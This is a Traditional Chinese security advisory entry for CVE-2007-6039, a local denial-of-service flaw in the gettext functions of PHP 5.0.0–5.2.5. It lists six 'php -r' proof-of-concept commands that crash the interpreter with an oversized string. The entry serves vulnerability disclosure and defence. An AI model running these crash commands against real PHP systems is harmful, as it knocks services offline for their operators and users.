|
|

PHP 多個 GetText 函數阻斷服務弱點 |
| Web-704 |
低風險 |
影響平台:
Windows, UNIX
|
| |
攻擊需求:
由本地進行攻擊 |
| |
造成危害:
阻斷服務 |
| |
 |
攻擊模式: |
| |
php -r 'dgettext(str_repeat("A",8476509),"hi");'
php -r 'dcgettext(LC_CTYPE,str_repeat("A",8476509),"hi");'
php -r 'dngettext("hi",str_repeat("A",8476509),"hi",-1);'
php -r 'gettext(str_repeat("A",8476509));'
php -r 'ngettext(str_repeat("A",8476509),"hi",-1);'
php -r 'dcgettext(LC_CTYPE,str_repeat("A",8476509),"hi");' |
| |
CVSS 弱點評分:
2.1 |
| |
CVE ID:
CVE-2007-6039
|
| |
| |
 |
內容描述: |
| |
PHP 5.0.0 - 5.2.5 的版本存在阻斷服務弱點, 問題發生在 dgettext, dcgettext, gettext, dngettext 及 ngettext 函數. 本地攻擊者可以讓 這些函數處理一個超長字串而當掉程式. |
| |
 |
修補方式: |
| |
尚未有修補程式. |
| |
 |
相關連結: |
| |
. The PHP Group Web site - "PHP: Downloads" http://www.php.net/downloads.php .
BugTraq Mailling List "PHP <= 5.2.5 Gettext Lib Multiple Denial of service http://www.securityfocus.com/archive/1/archive/1/483648/100/0/threaded
|
| |
BugTRAQ ID:
26428
|
| |
X-Force ID:
38443
|
| |
| |
發佈日期:
2007-12-01 |
Copyright© DragonSoft Security Associates, Inc.
版權所有© 中華龍網股份有限公司
|
資料庫的內容資訊可能在未經通知下修改. 對於提供的資訊內容並未保證任何性能、適當性或其他任何特殊用途, 其全部之風險均由使用此資訊的使用者自行負擔. 資料庫內容允許非營利事業單位轉載, 但不得將內容予以拷貝修改. 並需註明資料來源.
|
|
|